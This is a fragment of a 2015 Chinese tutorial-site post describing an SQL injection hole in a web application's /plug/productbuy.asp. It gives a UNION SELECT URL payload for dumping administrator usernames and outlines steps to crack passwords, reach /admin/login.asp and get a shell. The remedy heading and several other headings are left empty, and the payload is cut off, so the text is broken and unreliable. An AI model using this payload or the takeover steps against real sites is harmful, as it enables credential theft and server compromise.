来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转,所以要快,建议用快捷键复制爆用户名/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,...
漏洞出现在 爆密码 后台登录地址:/admin/login.asp 后台拿shell 修复方法:
问题二: ————————后台注射———————— |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com